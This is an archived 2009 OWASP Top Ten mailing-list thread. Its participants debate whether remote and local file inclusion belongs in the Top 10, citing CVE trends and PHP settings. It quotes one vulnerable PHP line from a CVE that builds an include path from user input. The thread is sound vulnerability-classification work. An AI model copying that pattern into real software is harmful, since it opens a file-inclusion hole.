[Owasp-topten] RFI taken out

tyronmiller at gmail.com tyronmiller at gmail.com
Thu Nov 19 16:48:28 EST 2009


Hey Dave,

Like I said, I don't think its a good idea to group vulnerabilities to such  
a high level because the Top 10 needs to be basic enough for non-pen  
testers to easily understand what needs to be fixed, which has been  
mentioned by a couple of people now.

Although I personally think its a mistake (since its a major way of  
compromising a web server), I would prefer to see RFI/LFI in an appendix  
of "The Reject Vulnerabilities" in its own section than grouped into a  
category where it just disappears.

Ty


On , Dave Wichers <dave.wichers at aspectsecurity.com> wrote:
> I'm OK with sneaking PHP RFI back in to the Top 10 as a configuration

> item that is now covered under A6 - Security Misconfiguration.



> I don't know if that is a stretch but it at least is a place to hang

> your hat. :-)



> -Dave



> -----Original Message-----

> From: Steven M. Christey [mailto:coley at linus.mitre.org]

> Sent: Tuesday, November 17, 2009 7:22 PM

> To: Ty Miller; Dave Wichers

> Cc: owasp-topten at lists.owasp.org

> Subject: Re: [Owasp-topten] RFI taken out





> On Tue, 17 Nov 2009, Dave Wichers wrote:



> > we are trying to get a sense of how big this problem is across all

> users

> > of the top 10. Based on the data we saw from MITRE, Aspect, White Hat,

> > and Softek, the frequency of this issue had dropped significantly

> since

> > 2006/2007, and for non-PHP developers this is a relatively rare issue.



> Based on my interpretation of the CVE data, RFI has dropped (relatively

> speaking), suggesting that the pool of obviously-vulnerable applications

> is dropping, or there is a higher cost-benefit ratio for launching a

> successful attack. I'm seeing more CVEs that target code snippets like

> this one from CVE-2009-3064:



> require("./../".$_GET["filename"]);



> This is more LFI than RFI.



> Also - in modern PHPs, allow_url_fopen is disabled, which in conjunction

> with restrictive register_globals settings, suggests that much of the

> remaining RFI problem is related to configuration. (Though admittedly,

> some modern PHP oddities are still equivalent to RFI, and admins are

> often

> stuck using older PHP versions.)



> Note that RFI/LFI is occasionally reported in CVE for other languages

> such

> as ColdFusion, Python, Ruby, and other interpreted languages. But

> that's

> extremely rare. (Could be that the researchers aren't paying attention

> in

> this area, though.)



> Disclaimer: CVE data is necessarily affected by what vuln researchers

> decide to publish, so it reflects their own biases. And as Dave said,

> CVE

> isn't the only data source for the Top Ten.



> - Steve

-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-topten/attachments/20091119/d96f29d4/attachment.html 


More information about the Owasp-topten mailing list